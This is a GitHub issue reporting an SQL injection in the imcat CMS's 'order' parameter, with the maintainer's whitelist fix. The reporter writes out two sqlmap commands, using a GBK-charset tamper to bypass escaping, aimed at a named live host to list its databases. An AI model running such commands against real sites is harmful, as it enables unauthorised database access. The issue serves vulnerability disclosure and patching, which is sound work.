Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

the vulnerability report: sql injection vulnerability in index.php page . #2

Closed
KernelC opened this issue Aug 6, 2019 · 1 comment
Closed

the vulnerability report: sql injection vulnerability in index.php page . #2

KernelC opened this issue Aug 6, 2019 · 1 comment

Comments

@KernelC
Copy link

KernelC commented Aug 6, 2019
edited

Exploit vulnerability :
Test parameter : order
image

Use sqlmap(http://sqlmap.org/) and use sqlmap-tamper : unmagicquotes
payload:
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'

image

sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbs
GET databases;

image

Build install imcat and test vuln:

image

image

image

The Vuln-src-code:
image

because php code set database charset=GBK so bypass addslashes or GPC .

Safetity up:

  1. mysql database charset UTF-8
  2. Checking http input(GET/POST) data fiter dangerous that.
@peacexie peacexie pinned this issue Aug 12, 2019
@peacexie
Copy link
Owner

peacexie commented Aug 12, 2019
edited

  • Thanks!
  • I'll fix it temporary as this
  • File: /imcat/core/dops/dopExtra.php, Code as below:
    function __construct($tab='',$cfg=array()){ 
        //...
        $this->soset($cfg);
        $dord = basReq::val('order','atime'); // cfg.soorders
        if(isset($cfg['soorders']) && !isset($cfg['soorders'][$dord])){
            die("Error `{$dord}`");
        }
        $this->order = $this->so->order = empty($cfg['order']) ? $dord : $cfg['order'];
    }

@peacexie peacexie reopened this Aug 12, 2019
peacexie added a commit that referenced this issue Aug 12, 2019
@peacexie
fix:#2 (comment)
7a91271
@peacexie peacexie unpinned this issue Aug 12, 2019
@peacexie peacexie pinned this issue Aug 12, 2019
@peacexie peacexie unpinned this issue Aug 12, 2019
@peacexie peacexie pinned this issue Aug 12, 2019
@peacexie peacexie unpinned this issue Aug 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@peacexie @KernelC